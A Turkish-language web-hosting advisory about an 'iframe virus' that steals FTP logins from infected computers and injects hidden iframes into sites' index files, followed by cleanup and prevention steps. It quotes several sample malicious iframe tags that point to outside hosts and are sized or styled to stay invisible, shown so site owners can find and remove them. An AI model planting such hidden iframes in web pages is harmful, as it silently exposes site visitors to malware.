iframe virüsü

iframe virüsü

Son zamanlarda ortaya çıkan ve bilginiz dahilinde olmadan FTP programınızı kullanarak adres listesindeki sitelere zararlı kod ekleyen bir çeşit virüs büyük hızla yayılmaya devam etmektedir.

Bu virüs bilgisayarınıza bulaştıkdan sonra o bilgisayarla hangi sitenin ftp'sini açarsanız açın girdiğiniz ftp bilgilerini kaydederek, sitelere girip index.php, index.html, index.htm, default.asp'in içlerine iframe kodu atiyor atılan iframe kodu şu şekildedir:

Örnek Bazı Virüs Kodları :

<iframe src="http://110.a38q.cn/lx.htm" width="100" height="0" frameborder="0"></iframe>

veya

<iframe src='http://81.95.145.240/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 />FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

veya

<iframe src='http:/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

veya

<iframe src="http://*****.cn/in/" width=1 height=1 style="visibility: hidden"></iframe>

Nasıl Bulaşır

Virüs bulaşmış bir web sitesine girdiğiniz zaman ve bilgisayarınızda güncellenmiş ve bu virüsü tanıyan bir antivirüs programı yüklü değilse bu virüs sizede bulaşır.

Acil Önlem Paketi

1- Web sitenizi olduğu gibi bilgisayarınıza indirin.
2- Virüs bulaşmış sayfaları bulup içindeki virüs kodlarını silin. (Yukarıda virüs kodları verilmiştir.)
2- Web Sitenizin FTP Bilgilerini (Kullanıcı Adınızı veya Şifrenizi) değiştirin.
3- Bilgisayarınızı güncel bir antivirüs programları ile taratın. (Tavsiyemiz Kaspersky )
4- Eğer antivirüs programları bilgisayarınızda ilgili iframe virüsünü bulamamışsa bilgisayarınıza format atınız.
5- Bilgisayarınızın virüsten temizlendiğine emin olduysanız web sitenizi tekrar FTP ile sunucuya gönderebilirsiniz.

Iframe Virüsünden Korunma

1- PHP Siteler için: Web sitenizdeki tüm index.php ,index.htm, index.html dosyalarının chmod değerini 444 yapınız.
2- ASP siteler için: Web sitenizdeki tüm index.asp, default.asp, index.htm, index.html dosyalarını salt okunur yapın veya FTP User kullanıcısının emedyaweb olarak talep ettiğiniz takdirde biz yapıyoruz) yazma iznini kaldırın.
3- Ayrıca: FTP ile Dosya gönderme işleminiz bittiği zaman FTP şifrenizi hemen değiştirin.
4- Bilgisayarınıza güncel bir antivirüs programı bulundarmaya özen gösterin. Tavsiyemiz Kaspersky'dır.
5- Ad-Aware gibi trojan temizleme programları ile bilgisayarınız 2-3 günde bir taratın.

Sizde düşüncelerinizi paylaşabilirsiniz